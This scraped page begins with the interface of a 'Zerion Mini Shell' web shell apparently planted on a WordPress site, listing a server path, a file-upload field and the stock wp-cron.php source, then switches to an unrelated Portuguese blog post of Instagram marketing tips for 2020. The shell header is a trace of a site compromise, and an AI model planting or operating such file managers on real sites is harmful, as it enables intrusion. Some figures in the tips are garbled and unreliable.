Mini Shell

Direktori : /home12/nephilim/public_html/icetone.net/
Upload File :
Current File : /home12/nephilim/public_html/icetone.net/wp-cron.php

<?php
/**
 * A pseudo-CRON daemon for scheduling WordPress tasks
 *
 * WP Cron is triggered when the site receives a visit. In the scenario
 * where a site may not receive enough visits to execute scheduled tasks
 * in a timely manner, this file can be called directly or via a server
 * CRON daemon for X number of times.
 *
 * Defining DISABLE_WP_CRON as true and calling this file directly are
 * mutually exclusive and the latter does not rely on the former to work.
 *
 * The HTTP request to this file will not slow down the visitor who happens to
 * visit when the cron job is needed to run.
 *
 * @package WordPress
 */

ignore_user_abort( true );

/* Don't make the request block till we finish, if possible. */
if ( function_exists( 'fastcgi_finish_request' ) && version_compare( phpversion(), '7.0.16', '>=' ) ) {
	if ( ! headers_sent() ) {
		header( 'Expires: Wed, 11 Jan 1984 05:00:00 GMT' );
		header( 'Cache-Control: no-cache, must-revalidate, max-age=0' );
	}

	fastcgi_finish_request();
}

if ( ! empty( $_POST ) || defined( 'DOING_AJAX' ) || defined( 'DOING_CRON' ) ) {
	die();
}

/**
 * Tell WordPress we are doing the CRON task.
 *
 * @var bool
 */
define( 'DOING_CRON', true );

if ( ! defined( 'ABSPATH' ) ) {
	/** Set up WordPress environment */
	require_once __DIR__ . '/wp-load.php';
}

/**
 * Retrieves the cron lock.
 *
 * Returns the uncached `doing_cron` transient.
 *
 * @ignore
 * @since 3.3.0
 *
 * @global wpdb $wpdb WordPress database abstraction object.
 *
 * @return string|false Value of the `doing_cron` transient, 0|false otherwise.
 */
function _get_cron_lock() {
	global $wpdb;

	$value = 0;
	if ( wp_using_ext_object_cache() ) {
		/*
		 * Skip local cache and force re-fetch of doing_cron transient
		 * in case another process updated the cache.
		 */
		$value = wp_cache_get( 'doing_cron', 'transient', true );
	} else {
		$row = $wpdb->get_row( $wpdb->prepare( "SELECT option_value FROM $wpdb->options WHERE option_name = %s LIMIT 1", '_transient_doing_cron' ) );
		if ( is_object( $row ) ) {
			$value = $row->option_value;
		}
	}

	return $value;
}

$crons = wp_get_ready_cron_jobs();
if ( empty( $crons ) ) {
	die();
}

$gmt_time = microtime( true );

// The cron lock: a unix timestamp from when the cron was spawned.
$doing_cron_transient = get_transient( 'doing_cron' );

// Use global $doing_wp_cron lock, otherwise use the GET lock. If no lock, try to grab a new lock.
if ( empty( $doing_wp_cron ) ) {
	if ( empty( $_GET['doing_wp_cron'] ) ) {
		// Called from external script/job. Try setting a lock.
		if ( $doing_cron_transient && ( $doing_cron_transient + WP_CRON_LOCK_TIMEOUT > $gmt_time ) ) {
			return;
		}
		$doing_wp_cron        = sprintf( '%.22F', microtime( true ) );
		$doing_cron_transient = $doing_wp_cron;
		set_transient( 'doing_cron', $doing_wp_cron );
	} else {
		$doing_wp_cron = $_GET['doing_wp_cron'];
	}
}

/*
 * The cron lock (a unix timestamp set when the cron was spawned),
 * must match $doing_wp_cron (the "key").
 */
if ( $doing_cron_transient !== $doing_wp_cron ) {
	return;
}

foreach ( $crons as $timestamp => $cronhooks ) {
	if ( $timestamp > $gmt_time ) {
		break;
	}

	foreach ( $cronhooks as $hook => $keys ) {

		foreach ( $keys as $k => $v ) {

			$schedule = $v['schedule'];

			if ( $schedule ) {
				wp_reschedule_event( $timestamp, $schedule, $hook, $v['args'] );
			}

			wp_unschedule_event( $timestamp, $hook, $v['args'] );

			/**
			 * Fires scheduled events.
			 *
			 * @ignore
			 * @since 2.1.0
			 *
			 * @param string $hook Name of the hook that was scheduled to be fired.
			 * @param array  $args The arguments to be passed to the hook.
			 */
			do_action_ref_array( $hook, $v['args'] );

			// If the hook ran too long and another cron process stole the lock, quit.
			if ( _get_cron_lock() !== $doing_wp_cron ) {
				return;
			}
		}
	}
}

if ( _get_cron_lock() === $doing_wp_cron ) {
	delete_transient( 'doing_cron' );
}

die();

Zerion Mini Shell 1.0
Como arrasar no instagram em 2020? – IceTone

Como arrasar no instagram em 2020?

O Instagram que era apenas uma rede social para partilha de fotografias foi ganhando visibilidade nos últimos anos!
Preparar a sua estratégia de marketing digital e fazer crescer a sua marca no instagram em 2020 deverá ser uma prioridade.
O ano de 2019 foi sem dúvida o ano do Instagram, tornaram os likes dos posts invisívieis, criaram a IGTV para que pudesse competir
com o youtube e os Stories fazem sucesso!

Quer seja um influenciador, uma marca, ou um projecto deverá ler com atenção as nossas dicas se quer ter sucesso no Instagram em 2020!


1-Stories
Os influenciadores estão apostar cada vez menos no feed e a culpa será do algoritmo, que trava o alcance.
Por isso a única forma de ter um maior alcance junto da comunidade é fazer mais stories.

2-IGTV
O principal formato de conteúdo a crescer nos próximos anos dentro do Instagram será o vídeo, portanto pense em criar conteúdos para a sua Marca.

3-Posts
A tendência será de menos posts no feed 1 a 2 por semana para pequenos ou médios influenciadores.
Os grandes continuaram a ter o mesmo alcance.
Como vai escrever menos posts deverá ter atenção: Qual é o seu objetivo e como o quer mostrar no instagram?
Envolva sempre a sua audiência no assunto! Construa a sua marca com storytelling no feed. Algo mais pessoal e profundo.
O mínimo são 405 caracteres por post em 2020 (não incluindo hasthags).
As taxas de engajamento tornam-se maiores nas legendas mais longas.
A estética do feed é muito importante para o crescimento da marca ou influencionador, mas vai tornar-se mais subjetiva pois o conteúdo será mais pontuado em relação
a um feed esteticamente bonito!

Sobre o que deve escrever?
Segundo um estudo os temas mais vistos no Instagram são: Maternidade, plantas, selfies, paisagens, Viagens entre outros.
Sobre o que não deve escrever…o Instagram está a penalizar conteúdos relacionados com armas e tabagismo!
A plataforma também já fez saber que esta medida afectará também outros temas como álcool e cápsulas de emagrecimento.
Fique atento se o seu negócio pertence a uma destas categorias.


4-Hashtags
Apesar das constastes mudanças do Instagram, vão manter-se relevantes por isso use no mínimo 10.
Pode usar no Post separado do conteúdo ou num comentário!
Ao clicar numa hashtag, você vai poder navegar pelas publicações que foram etiquetadas com a mesma tag, tendo assim mais chance de aparecer para outros utilizadores e
mostrar o seu produto.



5-Horários
No Feed os novos conteúdos têm prioridade.


6-Tipos de Influenciadores
Nano, Micro ou Macro influenciador
nano < 10k
micro < emtre 10 e 50k
mid < entre 50 a 300k
macro < entre 300 a 1.5k

Mas as marcas não vão sempre usar os Macro influenciadores, muitas marcas usam nanos ou micros para terem um alcance diferente e até quem sabe mais
real dentro da comunidade!
Se quer atingir outros mercados e novas audiências pense de uma forma global.



7-Dicas extra
Comentários – Vai ser importante os likes nos comentários, quanto mais comentários tiver mais a taxa de engajement aumenta tendo assim mais alcance.
Bio do Instagram – Partilhe um bocadinho de si aqui, com uma hashtag apenas sua. Use fontes diferentes! Pense fora da caixa!
Hashtags – Veja as da sua concorrência será mais fácil chegar ao mesmo público


Precisa de ajuda para alcançar o seu público-alvo?
Envie-nos um email!

Comments are closed.